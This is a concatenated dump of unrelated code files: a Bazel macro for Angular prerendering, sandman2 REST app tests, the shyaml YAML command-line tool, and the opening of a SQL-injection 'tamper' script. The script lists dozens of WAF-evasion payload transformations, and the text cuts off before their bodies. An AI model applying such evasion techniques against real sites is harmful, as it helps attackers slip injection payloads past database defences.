data = subreddit_page.get_selected_item()
assert data['hidden'] is False
# Make sure that the status was actually updated on the server side
data['object'].refresh()
assert data['object'].hidden is False
``` |
{
"source": "0xflotus/rules_nodejs",
"score": 2
} |
#### File: angular/tools/angular_prerender.bzl
```python
load("@build_bazel_rules_nodejs//:index.bzl", _nodejs_binary = "nodejs_binary", _nodejs_test = "nodejs_test")
load("@npm//@bazel/typescript:index.bzl", _ts_library = "ts_library")
def _get_output_path(route, root_at):
return root_at + "/" + route + "/index.html"
def ng_prerender(name, index, prerender_roots = [], **kwargs):
"""
Helper macro for prerendering Angular routes to index files as part of the build
The outputs of this macro are:
%name% - all the rendered roots, plus the root route /
%name%.root - an alias referencing just the root index file
%name%.%route% - an alias referencing each rendered route, with / replaced by underscores
Args:
name: Rule name for the main output genrule
      index: Label for the production index.html file to render into
      prerender_roots: A list of roots that will be prerendered as part of this macro; the root route / is always rendered
"""
renderer_lib = "%s_renderer_lib" % name
_ts_library(
name = renderer_lib,
srcs = ["//src:prerender.ts"],
deps = [
"//src/app:app_server",
"@npm//@angular/platform-server",
"@npm//zone.js",
"@npm//domino",
"@npm//reflect-metadata",
"@npm//@types/node",
],
)
bin = "%s_bin" % renderer_lib
_nodejs_binary(
name = bin,
data = [
":%s" % renderer_lib,
"@npm//@angular/platform-server",
"@npm//zone.js",
"@npm//domino",
"@npm//reflect-metadata",
],
install_source_map_support = False,
entry_point = "//src:prerender.ts",
)
root_at = "_prerender/" + native.package_name()
# we can't output "foo/index.html" since that collides with source files and will likely cross a package boundary
# so we output "_prerender/pkg_name/route/index.html"
prerender_root_outs = [_get_output_path(route, root_at) for route in prerender_roots]
root_index = "%s/index.html" % root_at
visibility = kwargs.pop("visibility", [])
native.genrule(
name = name,
srcs = [index],
outs = [root_index] + prerender_root_outs,
cmd = "$(location :%s) --index $(location %s) --outs $(OUTS) --routes / %s" % (bin, index, " ".join(prerender_roots)),
tools = [":%s" % bin],
message = "Prerendering Angular",
visibility = visibility,
tags = kwargs.pop("tags", []),
)
# convenience "output groups" from macro
native.alias(
name = "%s.root" % name,
actual = root_index,
visibility = visibility,
)
[
native.alias(
name = "%s.%s" % (name, route.replace("/", "_")),
actual = _get_output_path(route, root_at),
visibility = visibility,
)
for route in prerender_roots
]
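# Example BUILD usage (sketch; the target names and routes below are hypothetical,
# only ``index`` and ``prerender_roots`` are real parameters of the macro above):
#
#   ng_prerender(
#       name = "prerender",
#       index = ":index_prod",
#       prerender_roots = ["about", "contact/form"],
#   )
#
# which yields :prerender.root plus :prerender.about and :prerender.contact_form
# aliases, following the naming scheme documented in the docstring above.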
def ng_prerender_test(name, index, route, expected_elements = [], **kwargs):
"""
Simple smoke test for a prerendered index file, as generated by ng_prerender
Args:
name: Rule name for the test
index: Label of the index file under test
route: The route that this index file belongs to
expected_elements: An optional array of expected elements that should appear in the index file
"""
_ts_library(
name = "%s_render_spec" % name,
srcs = ["//src:prerender-spec.ts"],
deps = [
"@npm//@types/node",
],
testonly = 1,
)
_nodejs_test(
name = name,
data = [
":%s_render_spec" % name,
index,
],
templated_args = ["--index $(location %s)" % index, "--route %s" % route, "--expected %s" % (" ".join(expected_elements))],
entry_point = "//src:prerender-spec.ts",
tags = kwargs.pop("tags", []),
)
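# Example usage (sketch; labels and expected elements are hypothetical):
#
#   ng_prerender_test(
#       name = "prerender_about_test",
#       index = ":prerender.about",
#       route = "/about",
#       expected_elements = ["app-root"],
#   )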
``` |
{
"source": "0xflotus/sandman2",
"score": 2
} |
#### File: 0xflotus/sandman2/run.py
```python
from sandman2 import get_app
app = get_app('sqlite+pysqlite:///tests/data/db.sqlite3')
def main():
app.run(debug=True)
if __name__ == '__main__':
main()
```
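A minimal sketch of exercising the app built in `run.py` without starting a live server, using Flask's built-in test client. The `/user/` endpoint is an assumption: sandman2 exposes one resource per table, and the tables inside `tests/data/db.sqlite3` are not shown here.
```python
from sandman2 import get_app

app = get_app('sqlite+pysqlite:///tests/data/db.sqlite3')

with app.test_client() as client:
    # '/user/' is a hypothetical resource name; substitute a real table
    response = client.get('/user/')
    print(response.status_code, response.get_json())
```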
#### File: sandman2/tests/conftest.py
```python
import os
import importlib
import inspect
import shutil
import sys
sys.path.insert(0, os.path.abspath('.'))
import pytest
from sandman2 import get_app, db
@pytest.yield_fixture(scope='function')
def app(request):
"""Yield the application instance."""
database = getattr(request.module, 'database', 'db.sqlite3')
read_only = getattr(request.module, 'read_only', False)
exclude_tables = getattr(request.module, 'exclude_tables', None)
test_database_path = os.path.join('tests', 'data', 'test_db.sqlite3')
pristine_database_path = os.path.join('tests', 'data', database)
shutil.copy(pristine_database_path, test_database_path)
model_module = getattr(request.module, 'model_module', None)
user_models = []
if model_module:
module = importlib.import_module(model_module)
for name, obj in inspect.getmembers(module):
if inspect.isclass(obj):
if name not in ('Model', 'AutomapModel'):
user_models.append(obj)
application = get_app(
'sqlite+pysqlite:///{}'.format(
test_database_path),
user_models=user_models,
exclude_tables=exclude_tables,
read_only=read_only)
application.testing = True
yield application
with application.app_context():
db.session.remove()
db.drop_all()
os.unlink(test_database_path)
```
#### File: sandman2/tests/test_user_models.py
```python
import json
from pytest_flask.fixtures import client
from tests.resources import (
GET_ERROR_MESSAGE,
INVALID_ACTION_MESSAGE,
)
model_module = 'tests.user_models'
database = 'blog.sqlite3'
def test_validate_get(client):
"""Do we get back an error message when making a GET request that fails
validation?"""
response = client.get('/user/')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_get_single_resource(client):
"""Do we get back an error message when making a GET request for a
single resource which fails validation?"""
response = client.get('/user/1')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_get_datetime(client):
"""Do we get back a properly formatted datetime on a model that defines one?"""
response = client.get('/post/1.0')
assert response.status_code == 200
assert response.json['posted_at'] is not None
def test_validate_post(client):
"""Do we get back an error message when making a POST request that fails
validation?"""
response = client.post(
'/user/',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_post_existing_resource(client):
"""Do we get back an error message when making a POST request on a resource that already exists?"""
response = client.post(
'/user/',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_put_existing(client):
"""Do we get back an error message when making a PUT request for
an existing resource?"""
response = client.put(
'/user/1',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_put_new(client):
"""Do we get back an error message when making a PUT request for a
totally new resource?"""
response = client.put(
'/user/2',
data=json.dumps({
'name': '<NAME>',
'email': '<EMAIL>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_patch(client):
"""Do we get back an error message when making a PATCH request on an
existing resource?"""
response = client.patch(
'/user/1',
data=json.dumps({
'name': '<NAME>',
}),
headers={'Content-Type': 'application/json'}
)
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
def test_validate_delete(client):
"""Do we get back an error message when making a DELETE request that fails
validation?"""
response = client.delete('/user/1')
assert response.status_code == 400
assert response.json['message'] == INVALID_ACTION_MESSAGE
```
#### File: sandman2/tests/user_models.py
```python
import datetime
from sandman2.model import db, Model
from tests.resources import (
GET_ERROR_MESSAGE,
INVALID_ACTION_MESSAGE,
)
class User(db.Model, Model):
"""A user of the blogging application."""
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
email = db.Column(db.String, unique=True)
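# Validation hooks: sandman2 consults per-verb ``is_valid_<method>``
# staticmethods on a model. Here each hook unconditionally returns an error
# message, which the accompanying tests above expect to surface as an
# HTTP 400 response carrying that message.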
@staticmethod
def is_valid_get(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_post(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_patch(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_put(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
@staticmethod
def is_valid_delete(request, resource):
"""Return error message in all cases (just for testing)."""
return INVALID_ACTION_MESSAGE
class Blog(db.Model, Model):
"""An online weblog."""
__tablename__ = 'blog'
id = db.Column(db.String, primary_key=True)
name = db.Column(db.String)
subheader = db.Column(db.String, nullable=True)
creator_id = db.Column(db.Integer, db.ForeignKey('user.id'))
creator = db.relationship(User)
class Post(db.Model, Model):
"""An individual blog post."""
__tablename__ = 'post'
id = db.Column(db.Numeric, primary_key=True)
title = db.Column(db.String)
content = db.Column(db.String)
posted_at = db.Column(db.DateTime, default=datetime.datetime.now)
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
author = db.relationship(User)
``` |
{
"source": "0xflotus/shyaml",
"score": 2
} |
#### File: 0xflotus/shyaml/shyaml.py
```python
from __future__ import print_function
import sys
import os.path
import re
import textwrap
import yaml
__version__ = "%%version%%" ## gets filled at release time by ./autogen.sh
__with_libyaml__ = False
if not os.environ.get("FORCE_PYTHON_YAML_IMPLEMENTATION"):
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
__with_libyaml__ = True
except ImportError: ## pragma: no cover
pass
if not __with_libyaml__:
from yaml import SafeLoader, SafeDumper ## noqa: F811
__with_libyaml__ = False
PY3 = sys.version_info[0] >= 3
WIN32 = sys.platform == 'win32'
EXNAME = os.path.basename(__file__ if WIN32 else sys.argv[0])
for ext in (".py", ".pyc", ".exe", "-script.py", "-script.pyc"): ## pragma: no cover
if EXNAME.endswith(ext): ## pragma: no cover
EXNAME = EXNAME[:-len(ext)]
break
USAGE = """\
Usage:
%(exname)s {-h|--help}
%(exname)s {-V|--version}
%(exname)s [-y|--yaml] ACTION KEY [DEFAULT]
""" % {"exname": EXNAME}
HELP = """
Parses and output chosen subpart or values from YAML input.
It reads YAML from stdin and will output its return value on stdout.
%(usage)s
Options:
-y, --yaml
Output only YAML safe value, more precisely, even
literal values will be YAML quoted. This behavior
is required if you want to output YAML subparts and
further process it. If you know you are dealing
with a safe literal value, then you don't need this.
(Default: no safe YAML output)
ACTION Depending on the type of data you've targetted
thanks to the KEY, ACTION can be:
These ACTIONs apply to any YAML type:
get-type ## returns a short string
get-value ## returns YAML
These ACTIONs apply to 'sequence' and 'struct' YAML types:
get-values{,-0} ## returns list of YAML
get-length ## returns an integer
These ACTIONs apply to 'struct' YAML type:
keys{,-0} ## returns list of YAML
values{,-0} ## returns list of YAML
key-values{,-0} ## returns list of YAML
Note that any value returned is returned on stdout, and
when returning ``list of YAML``, it'll be separated by
a newline or ``NUL`` char depending on whether you've used the
``-0`` suffixed ACTION.
KEY Identifier to browse and target subvalues into YAML
structure. Use ``.`` to parse a subvalue. If you need
to use a literal ``.`` or ``\\``, use ``\\`` to quote it.
Use struct keyword to browse ``struct`` YAML data and use
integers to browse ``sequence`` YAML data.
DEFAULT if provided and the given KEY does not match any value in
the provided YAML, then DEFAULT will be returned. If no
default is provided and the KEY does not match any value
in the provided YAML, %(exname)s will fail with an error
message.
Examples:
## get last grocery
cat recipe.yaml | %(exname)s get-value groceries.-1
## get all words of my french dictionary
cat dictionaries.yaml | %(exname)s keys-0 french.dictionary
## get YAML config part of 'myhost'
cat hosts_config.yaml | %(exname)s get-value cfgs.myhost
""" % {"exname": EXNAME, "usage": USAGE}
class ShyamlSafeLoader(SafeLoader):
"""Shyaml specific safe loader"""
class ShyamlSafeDumper(SafeDumper):
"""Shyaml specific safe dumper"""
## Ugly way to force both the Cython code and the normal code
## to get the output line by line.
class ForcedLineStream(object):
def __init__(self, fileobj):
self._file = fileobj
def read(self, size=-1):
## don't care about size
return self._file.readline()
def close(self):
## XXXvlab: for some reason, ``.close(..)`` doesn't seem to
## be used by any code. I'll keep this to avoid any bad surprise.
return self._file.close() ## pragma: no cover
class LineLoader(ShyamlSafeLoader):
"""Forcing stream in line buffer mode"""
def __init__(self, stream):
stream = ForcedLineStream(stream)
super(LineLoader, self).__init__(stream)
##
## Keep previous order in YAML
##
try:
## included in standard lib from Python 2.7
from collections import OrderedDict
except ImportError: ## pragma: no cover
## try importing the backported drop-in replacement
## it's available on PyPI
from ordereddict import OrderedDict
## Ensure that there are no collision with legacy OrderedDict
## that could be used for omap for instance.
class MyOrderedDict(OrderedDict):
pass
ShyamlSafeDumper.add_representer(
MyOrderedDict,
lambda cls, data: cls.represent_dict(data.items()))
def construct_omap(cls, node):
## Force unfolding reference and merges
## otherwise it would fail on 'merge'
cls.flatten_mapping(node)
return MyOrderedDict(cls.construct_pairs(node))
ShyamlSafeLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_omap)
##
## Support local and global objects
##
class EncapsulatedNode(object):
"""Holds a yaml node"""
def mk_encapsulated_node(s, node):
method = "construct_%s" % (node.id, )
data = getattr(s, method)(node)
class _E(data.__class__, EncapsulatedNode):
pass
_E.__name__ = str(node.tag)
_E._node = node
return _E(data)
def represent_encapsulated_node(s, o):
value = s.represent_data(o.__class__.__bases__[0](o))
value.tag = o.__class__.__name__
return value
ShyamlSafeDumper.add_multi_representer(EncapsulatedNode,
represent_encapsulated_node)
ShyamlSafeLoader.add_constructor(None, mk_encapsulated_node)
##
## Key specifier
##
def tokenize(s):
r"""Returns an iterable through all subparts of string splitted by '.'
So:
>>> list(tokenize('foo.bar.wiz'))
['foo', 'bar', 'wiz']
Contrary to traditional ``.split()`` method, this function has to
deal with any type of data in the string. So it actually
interprets the string. Characters with meaning are '.' and '\'.
Both of these can be included in a token by quoting them with '\'.
So dots or slashes can be contained in a token:
>>> print('\n'.join(tokenize(r'foo.dot<\.>.slash<\\>')))
foo
dot<.>
slash<\>
Notice that empty keys are also supported:
>>> list(tokenize(r'foo..bar'))
['foo', '', 'bar']
Given an empty string:
>>> list(tokenize(r''))
['']
And a None value:
>>> list(tokenize(None))
[]
"""
if s is None:
return
tokens = (re.sub(r'\\(\\|\.)', r'\1', m.group(0))
for m in re.finditer(r'((\\.|[^.\\])*)', s))
## an empty string superfluous token is added after all non-empty token
for token in tokens:
if len(token) != 0:
next(tokens)
yield token
def mget(dct, key):
r"""Allow to get values deep in recursive dict with doted keys
Accessing leaf values is quite straightforward:
>>> dct = {'a': {'x': 1, 'b': {'c': 2}}}
>>> mget(dct, 'a.x')
1
>>> mget(dct, 'a.b.c')
2
But you can also get subdict if your key is not targeting a
leaf value:
>>> mget(dct, 'a.b')
{'c': 2}
As a special feature, list access is also supported by providing a
(possibily signed) integer, it'll be interpreted as usual python
sequence access using bracket notation:
>>> mget({'a': {'x': [1, 5], 'b': {'c': 2}}}, 'a.x.-1')
5
>>> mget({'a': {'x': 1, 'b': [{'c': 2}]}}, 'a.b.0.c')
2
Keys that contains '.' can be accessed by escaping them:
>>> dct = {'a': {'x': 1}, 'a.x': 3, 'a.y': 4}
>>> mget(dct, 'a.x')
1
>>> mget(dct, r'a\.x')
3
>>> mget(dct, r'a.y') ## doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
MissingKeyError: missing key 'y' in dict.
>>> mget(dct, r'a\.y')
4
As a consequence, if your key contains a '\', you should also escape it:
>>> dct = {r'a\x': 3, r'a\.x': 4, 'a.x': 5, 'a\\': {'x': 6}}
>>> mget(dct, r'a\\x')
3
>>> mget(dct, r'a\\\.x')
4
>>> mget(dct, r'a\\.x')
6
>>> mget({'a\\': {'b': 1}}, r'a\\.b')
1
>>> mget({r'a.b\.c': 1}, r'a\.b\\\.c')
1
And even empty strings key are supported:
>>> dct = {r'a': {'': {'y': 3}, 'y': 4}, 'b': {'': {'': 1}}, '': 2}
>>> mget(dct, r'a..y')
3
>>> mget(dct, r'a.y')
4
>>> mget(dct, r'')
2
>>> mget(dct, r'b..')
1
It will complain if you are trying to get into a leaf:
>>> mget({'a': 1}, 'a.y') ## doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
NonDictLikeTypeError: can't query subvalue 'y' of a leaf...
if the key is None, the whole dct should be sent back:
>>> mget({'a': 1}, None)
{'a': 1}
"""
return aget(dct, tokenize(key))
class MissingKeyError(KeyError):
"""Raised when querying a dict-like structure on non-existing keys"""
def __str__(self):
return self.args[0]
class NonDictLikeTypeError(TypeError):
"""Raised when attempting to traverse non-dict like structure"""
class IndexNotIntegerError(ValueError):
"""Raised when attempting to traverse sequence without using an integer"""
class IndexOutOfRange(IndexError):
"""Raised when attempting to traverse sequence without using an integer"""
def aget(dct, key):
r"""Allow to get values deep in a dict with iterable keys
Accessing leaf values is quite straightforward:
>>> dct = {'a': {'x': 1, 'b': {'c': 2}}}
>>> aget(dct, ('a', 'x'))
1
>>> aget(dct, ('a', 'b', 'c'))
2
If key is empty, it returns unchanged the ``dct`` value.
>>> aget({'x': 1}, ())
{'x': 1}
"""
key = iter(key)
try:
head = next(key)
except StopIteration:
return dct
if isinstance(dct, list):
try:
idx = int(head)
except ValueError:
raise IndexNotIntegerError(
"non-integer index %r provided on a list."
% head)
try:
value = dct[idx]
except IndexError:
raise IndexOutOfRange(
"index %d is out of range (%d elements in list)."
% (idx, len(dct)))
else:
try:
value = dct[head]
except KeyError:
## Replace with a more informative KeyError
raise MissingKeyError(
"missing key %r in dict."
% (head, ))
except Exception:
raise NonDictLikeTypeError(
"can't query subvalue %r of a leaf%s."
% (head,
(" (leaf value is %r)" % dct)
if len(repr(dct)) < 15 else ""))
return aget(value, key)
def stderr(msg):
"""Convenience function to write short message to stderr."""
sys.stderr.write(msg)
def stdout(value):
"""Convenience function to write short message to stdout."""
sys.stdout.write(value)
def die(msg, errlvl=1, prefix="Error: "):
"""Convenience function to write short message to stderr and quit."""
stderr("%s%s\n" % (prefix, msg))
sys.exit(errlvl)
SIMPLE_TYPES = (str if PY3 else basestring, int, float, type(None))
COMPLEX_TYPES = (list, dict)
## these are not composite values
ACTION_SUPPORTING_STREAMING=["get-type", "get-length", "get-value"]
def magic_dump(value):
"""Returns a representation of values directly usable by bash.
Literal types are printed as-is (avoiding quotes around string for
instance). But complex type are written in a YAML useable format.
"""
return str(value) if isinstance(value, SIMPLE_TYPES) \
else yaml_dump(value)
def yaml_dump(value):
"""Returns a representation of values directly usable by bash.
Literal types are quoted and safe to use as YAML.
"""
return yaml.dump(value, default_flow_style=False,
Dumper=ShyamlSafeDumper)
def type_name(value):
"""Returns pseudo-YAML type name of given value."""
return type(value).__name__ if isinstance(value, EncapsulatedNode) else \
"struct" if isinstance(value, dict) else \
"sequence" if isinstance(value, (tuple, list)) else \
type(value).__name__
def get_version_info():
if yaml.__with_libyaml__:
import _yaml
libyaml_version = _yaml.get_version_string()
else:
libyaml_version = False
return ("unreleased" if __version__.startswith('%%') else __version__,
yaml.__version__,
libyaml_version,
__with_libyaml__,
sys.version.replace("\n", " "),
)
def _parse_args(args, USAGE, HELP):
opts = {}
opts["dump"] = magic_dump
for arg in ["-y", "--yaml"]:
if arg in args:
args.remove(arg)
opts["dump"] = yaml_dump
opts["quiet"] = False
for arg in ["-q", "--quiet"]:
if arg in args:
args.remove(arg)
opts["quiet"] = True
for arg in ["-L", "--line-buffer"]:
if arg not in args:
continue
args.remove(arg)
opts["loader"] = LineLoader
if len(args) == 0:
stderr("Error: Bad number of arguments.\n")
die(USAGE, errlvl=1, prefix="")
if len(args) == 1 and args[0] in ("-h", "--help"):
stdout(HELP)
exit(0)
if len(args) == 1 and args[0] in ("-V", "--version"):
version_info = get_version_info()
print("version: %s\nPyYAML: %s\nlibyaml available: %s\nlibyaml used: %s\nPython: %s"
% version_info)
exit(0)
opts["action"] = args[0]
opts["key"] = None if len(args) == 1 else args[1]
opts["default"] = args[2] if len(args) > 2 else None
return opts
class InvalidPath(KeyError):
"""Invalid Path"""
def __str__(self):
return self.args[0]
class InvalidAction(KeyError):
"""Invalid Action"""
def traverse(contents, path, default=None):
try:
try:
value = mget(contents, path)
except (IndexOutOfRange, MissingKeyError):
if default is None:
raise
value = default
except (IndexOutOfRange, MissingKeyError,
NonDictLikeTypeError, IndexNotIntegerError) as exc:
msg = str(exc)
raise InvalidPath(
"invalid path %r, %s"
% (path, msg.replace('list', 'sequence').replace('dict', 'struct')))
return value
class ActionTypeError(Exception):
def __init__(self, action, provided, expected):
self.action = action
self.provided = provided
self.expected = expected
def __str__(self):
return ("%s does not support %r type. "
"Please provide or select a %s."
% (self.action, self.provided,
self.expected[0] if len(self.expected) == 1 else
("%s or %s" % (", ".join(self.expected[:-1]),
self.expected[-1]))))
def act(action, value, dump=yaml_dump):
tvalue = type_name(value)
## Note: ``\n`` will be transformed by ``universal_newlines`` mechanism for
## any platform
termination = "\0" if action.endswith("-0") else "\n"
if action == "get-value":
return str(dump(value))
elif action in ("get-values", "get-values-0"):
if isinstance(value, dict):
return "".join("".join((dump(k), termination,
dump(v), termination))
for k, v in value.items())
elif isinstance(value, list):
return "".join("".join((dump(l), termination))
for l in value)
else:
raise ActionTypeError(
action, provided=tvalue, expected=["sequence", "struct"])
elif action == "get-type":
return tvalue
elif action == "get-length":
if isinstance(value, (dict, list)):
return len(value)
else:
raise ActionTypeError(
action, provided=tvalue, expected=["sequence", "struct"])
elif action in ("keys", "keys-0",
"values", "values-0",
"key-values", "key-values-0"):
if isinstance(value, dict):
method = value.keys if action.startswith("keys") else \
value.items if action.startswith("key-values") else \
value.values
output = (lambda x: termination.join(str(dump(e)) for e in x)) \
if action.startswith("key-values") else \
dump
return "".join("".join((str(output(k)), termination)) for k in method())
else:
raise ActionTypeError(
action=action, provided=tvalue, expected=["struct"])
else:
raise InvalidAction(action)
def do(stream, action, key, default=None, dump=yaml_dump,
loader=ShyamlSafeLoader):
"""Return string representations of target value in stream YAML
The key is used for traversal of the YAML structure to target
the value that will be dumped.
:param stream: file like input yaml content
:param action: string identifying one of the possible supported actions
:param key: string dotted expression to traverse yaml input
:param default: optional default value in case of missing end value when
traversing input yaml. (default is ``None``)
:param dump: callable that will be given a Python object to dump as YAML
(default is ``yaml_dump``)
:param loader: PyYAML's *Loader subclass to parse YAML
(default is ShyamlSafeLoader)
:return: generator of string representation of target value per
YAML docs in the given stream.
:raises ActionTypeError: when there's a type mismatch between the
action selected and the type of the targetted value.
(ie: action 'key-values' on non-struct)
:raises InvalidAction: when selected action is not a recognised valid
action identifier.
:raises InvalidPath: upon inexistent content when traversing YAML
input following the key specification.
"""
at_least_one_content = False
for content in yaml.load_all(stream, Loader=loader):
at_least_one_content = True
value = traverse(content, key, default=default)
yield act(action, value, dump=dump)
## In case of empty stream, we consider that it is equivalent
## to one document having the ``null`` value.
if at_least_one_content is False:
value = traverse(None, key, default=default)
yield act(action, value, dump=dump)
def main(args): ## pylint: disable=too-many-branches
"""Entrypoint of the whole commandline application"""
EXNAME = os.path.basename(__file__ if WIN32 else sys.argv[0])
for ext in (".py", ".pyc", ".exe", "-script.py", "-script.pyc"): ## pragma: no cover
if EXNAME.endswith(ext): ## pragma: no cover
EXNAME = EXNAME[:-len(ext)]
break
USAGE = """\
Usage:
%(exname)s {-h|--help}
%(exname)s {-V|--version}
%(exname)s [-y|--yaml] [-q|--quiet] ACTION KEY [DEFAULT]
""" % {"exname": EXNAME}
HELP = """
Parses and output chosen subpart or values from YAML input.
It reads YAML from stdin and will output its return value on stdout.
%(usage)s
Options:
-y, --yaml
Output only YAML safe value, more precisely, even
literal values will be YAML quoted. This behavior
is required if you want to output YAML subparts and
further process it. If you know you are dealing
with a safe literal value, then you don't need this.
(Default: no safe YAML output)
-q, --quiet
In case KEY value queried is an invalid path, quiet
mode will prevent the writing of an error message on
standard error.
(Default: no quiet mode)
-L, --line-buffer
Force parsing stdin line by line allowing to process
streamed YAML as it is fed instead of buffering
input and treating several YAML streamed document
at once. This is likely to have some small performance
hit if you have a huge stream of YAML document, but
then you probably don't really care about the
line-buffering.
(Default: no line buffering)
ACTION Depending on the type of data you've targetted
thanks to the KEY, ACTION can be:
These ACTIONs apply to any YAML type:
get-type ## returns a short string
get-value ## returns YAML
These ACTIONs apply to 'sequence' and 'struct' YAML types:
get-values{,-0} ## returns list of YAML
get-length ## returns an integer
These ACTIONs apply to 'struct' YAML type:
keys{,-0} ## returns list of YAML
values{,-0} ## returns list of YAML
key-values{,-0} ## returns list of YAML
Note that any value returned is returned on stdout, and
when returning ``list of YAML``, it'll be separated by
a newline or ``NUL`` char depending on whether you've used the
``-0`` suffixed ACTION.
KEY Identifier to browse and target subvalues into YAML
structure. Use ``.`` to parse a subvalue. If you need
to use a literal ``.`` or ``\\``, use ``\\`` to quote it.
Use struct keyword to browse ``struct`` YAML data and use
integers to browse ``sequence`` YAML data.
DEFAULT if provided and the given KEY does not match any value in
the provided YAML, then DEFAULT will be returned. If no
default is provided and the KEY does not match any value
in the provided YAML, %(exname)s will fail with an error
message.
Examples:
## get last grocery
cat recipe.yaml | %(exname)s get-value groceries.-1
## get all words of my french dictionary
cat dictionaries.yaml | %(exname)s keys-0 french.dictionary
## get YAML config part of 'myhost'
cat hosts_config.yaml | %(exname)s get-value cfgs.myhost
""" % {"exname": EXNAME, "usage": USAGE}
USAGE = textwrap.dedent(USAGE)
HELP = textwrap.dedent(HELP)
opts = _parse_args(args, USAGE, HELP)
quiet = opts.pop("quiet")
try:
first = True
for output in do(stream=sys.stdin, **opts):
if first:
first = False
else:
if opts["action"] not in ACTION_SUPPORTING_STREAMING:
die("Source YAML is multi-document, "
"which doesn't support any other action than %s"
% ", ".join(ACTION_SUPPORTING_STREAMING))
if opts["dump"] is yaml_dump:
print("---\n", end="")
else:
print("\0", end="")
if opts.get("loader") is LineLoader:
sys.stdout.flush()
print(output, end="")
if opts.get("loader") is LineLoader:
sys.stdout.flush()
except (InvalidPath, ActionTypeError) as e:
if quiet:
exit(1)
else:
die(str(e))
except InvalidAction as e:
die("'%s' is not a valid action.\n%s"
% (e.args[0], USAGE))
def entrypoint():
sys.exit(main(sys.argv[1:]))
if __name__ == "__main__":
entrypoint()
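## Python-level usage sketch (the YAML snippet below is made up for
## illustration; ``do`` and ``magic_dump`` are defined above):
##
##   import io
##   doc = io.StringIO("groceries:\n- eggs\n- milk\n")
##   for out in do(doc, "get-value", "groceries.-1", dump=magic_dump):
##       print(out)  ## -> milk
##
## ``mget``/``aget`` can likewise be used directly on plain Python dicts.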
``` |
{
"source": "0xflotus/SQLi-Query-Tampering",
"score": 3
} |
#### File: 0xflotus/SQLi-Query-Tampering/tamper.py
```python
import collections
import os
import random
import re
import string
class OrderedSet(collections.MutableSet):
"""
This class defines the set with ordered (as added) items
>>> foo = OrderedSet()
>>> foo.add(1)
>>> foo.add(2)
>>> foo.add(3)
>>> foo.pop()
3
>>> foo.pop()
2
>>> foo.pop()
1
"""
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def __contains__(self, key):
return key in self.map
def add(self, value):
if value not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[value] = [value, curr, end]
def discard(self, value):
if value in self.map:
value, prev, next = self.map.pop(value)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def pop(self, last=True):
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)
class SQLiTamper():
def __init__(self):
self._All = [self.chardoubleencode, self.versionedmorekeywords, self.versionedkeywords, self.uppercase, self.unmagicquotes, \
self.unionalltounion, self.symboliclogical, self. space2randomblank, self.space2plus, self.space2mysqldash, \
self.space2mysqlblank, self.space2mssqlhash, self.space2mssqlblank, self.space2morehash, self.space2morecomment, \
self.space2hash, self.space2dash, self.space2comment, self.sp_password, self.randomcomments, self.randomcase, self.plus2fnconcat, \
self.plus2concat, self.percentage, self.overlongutf8more, self.overlongutf8, self.multiplespaces, self.modsecurityzeroversioned, \
self.modsecurityversioned, self.lowercase, self.least, self.informationschemacomment, self.ifnull2ifisnull, self.ifnull2casewhenisnull, \
self.htmlencode, self.hex2char, self.halfversionedmorekeywords, self.greatest, self.escapequotes, self.equaltolike, self.concat2concatws, \
self.commentbeforeparentheses, self.commalessmid, self.commalesslimit, self.charunicodeescape, self.charunicodeencode, self.charencode, \
self.bluecoat, self.between, self.appendnullbyte, self.apostrophenullencode, self.apostrophemask]
self._General = [self.chardoubleencode, self.unmagicquotes, self.unionalltounion, self.symboliclogical, \
self.space2plus, self.randomcomments, self.randomcase, self.overlongutf8more, self.overlongutf8, \
self.multiplespaces, self.htmlencode, self.escapequotes, self.charunicodeescape, self.apostrophenullencode, \
self.apostrophemask, self.between, self.charencode, self.charunicodeencode, self.equaltolike, self.greatest, \
self.ifnull2ifisnull, self.percentage, self.space2randomblank, self.space2comment]
self._MSAccess = [self.appendnullbyte, self.between, self.bluecoat, self.charencode, self.charunicodeencode, self.concat2concatws, \
self.equaltolike, self.greatest, self.halfversionedmorekeywords, self.ifnull2ifisnull, self.modsecurityversioned, \
